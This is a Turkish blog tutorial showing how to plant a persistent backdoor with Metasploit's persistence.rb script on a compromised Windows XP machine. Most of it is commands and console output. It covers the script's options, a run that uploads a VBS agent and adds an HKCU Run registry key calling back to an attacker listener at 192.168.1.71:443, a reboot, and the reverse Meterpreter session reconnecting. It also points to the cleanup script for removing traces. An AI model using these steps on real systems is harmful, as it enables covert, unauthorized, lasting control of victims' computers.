MSF Meterpreter Kalıcı Backdoor

MSF Meterpreter Kalıcı Backdoor

June 15, 2017·İbrahim Korucuoğlu
İbrahim Korucuoğlu

Persistence.rb

Hedef sistemde oturum açtıktan sonra kalıcılık sağlamak için Metasploit Framework içinde kullanabileceğiniz bir diğer yöntem de persistence.rb script kodunu kullanmaktır.

Bu yöntem sayesinde, hedef bilgisayar güncellense bile tekrar bağlanma imkanınız bulunmaktadır. Ayrıca, hedef sistemin tekrar başlatılması da bağlantı yapmayı etkilemeyecektir.

Bir önceki konuda, metsvc için yaptığımız uyarıyı burada da tekrarlayalım. persistence.rb arka kapısı, bağlantı için herhangi bir oturum bilgisi kullanmaz. Bu açıklığı keşfeden herkes bağlantı sağlayabilir.

Hedef sistemde meterpreter oturum açtıktan sonra persistence.rb script kodunu kullanmadan önce yardım bilgilerini görüntüleyelim ve bize hangi imkanları sağladığını görelim.

meterpreter ***>***  run persistence -h

***[!]***  Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
***[!]***  Example: run post/windows/manage/persistence_exe OPTION***=*** value ***[*** ...]
Meterpreter Script ***for *** creating a persistent backdoor on a target host.

OPTIONS:

    -A   Automatically start a matching exploit/multi/handler to connect to the agent
    -L   Location ***in *** target host to write payload to, ***if *** none %TEMP% will be used.
    -P   Payload to use, default is windows/meterpreter/reverse_tcp.
    -S   Automatically start the agent on boot as a service ***(*** with SYSTEM privileges***)*** 
    -T   Alternate executable template to use
    -U   Automatically start the agent when the User logs on
    -X   Automatically start the agent when the system boots
    -h   This help menu
    -i   The interval ***in *** seconds between each connection attempt
    -p   The port on which the system running Metasploit is listening
    -r   The IP of the system running Metasploit listening ***for *** the connect back

Aşağıdaki persistence -U -i 5 -p 443 -r 192.168.1.71 komutu hangi işlemleri yapıyor?

-U, bir kullanıcı oturum açtığında bizim bilgisayarımıza otomatik bağlantı yapılmasını sağlar.

-i 5 Karşe taraftaki persistence.rb script kodu her 5 saniyede bir bize bağlanmaya çalışır.

-p 443 bizim dinleme yapan bilgisayarımızın dinleme yaptığı port numarasıdır.

-r 192.168.1.71 bizim dinleme yapan bilgisayarımızın IP numarasıdır.

meterpreter ***>***  run persistence -U -i 5 -p 443 -r 192.168.1.71
***[*** ******* ***]***  Creating a persistent agent: LHOST***=*** 192.168.1.71 LPORT***=*** 443 ***(*** interval***=*** 5 onboot***=*** true***)*** 
***[*** ******* ***]***  Persistent agent script is 613976 bytes long
***[*** ******* ***]***  Uploaded the persistent agent to C:\WINDOWS\TEMP\yyPSPPEn.vbs
***[*** ******* ***]***  Agent executed with PID 492
***[*** ******* ***]***  Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\YeYHdlEDygViABr
***[*** ******* ***]***  Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\YeYHdlEDygViABr
***[*** ******* ***]***  For cleanup use command: run multi_console_command -rc /root/.msf4/logs/persistence/XEN-XP-SP2-BARE_20100821.2602/clean_up__20100821.2602.rc
meterpreter ***>*** 

Verdiğimiz komut sonucunda başlatılan script, çıktılarda da görüleceği gibi işimiz tamamlandığında log temizleme işleminin nasıl yapılabileceğini de gösteriyor.

multi_console_command -rc /root/.msf4/logs/persistence/XEN-XP-SP2-BARE_20100821.2602/clean_up__20100821.2602.rc

Scriptin çalışıp çalışmadığını ve otomatik bağlantı yapıp yapmadığını, hedef bilgisayarı tekrar başlatarak anlayabiliriz. Hedef bilgisayarı yeniden başlatalım.

meterpreter ***>***  reboot
Rebooting...
meterpreter ***>***  exit

***[*** ******* ***]***  Meterpreter session 3 closed.  Reason: User exit

Dinleyici exploit/multi/handler modülünü tekrar başlatalım.

msf exploit***(*** ms08_067_netapi***)***  ***>***  use exploit/multi/handler
msf exploit***(*** handler***)***  ***>***  set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD ***=>***  windows/meterpreter/reverse_tcp
msf exploit***(*** handler***)***  ***>***  set LHOST 192.168.1.71
LHOST ***=>***  192.168.1.71
msf exploit***(*** handler***)***  ***>***  set LPORT 443
LPORT ***=>***  443
msf exploit***(*** handler***)***  ***>***  exploit

***[*** ******* ***]***  Started reverse handler on 192.168.1.71:443
***[*** ******* ***]***  Starting the payload handler...

Hedef bilgisayar tekrar başladığında, oturum açılır açılmaz yerel bilgisayara bağlantı, aşağıda görüldüğü gibi tekrar sağlanacaktır.

***[*** ******* ***]***  Sending stage ***(*** 748544 bytes***)***  to 192.168.1.161
***[*** ******* ***]***  Meterpreter session 5 opened ***(*** 192.168.1.71:443 -> 192.168.1.161:1045***)***  at 2010-08-21 12:31:42 -0600

meterpreter ***>***  sysinfo
Computer: XEN-XP-SP2-BARE
OS      : Windows XP ***(*** Build 2600, Service Pack 2***)*** .
Arch    : x86
Language: en_US
meterpreter ***>*** 

Last updated on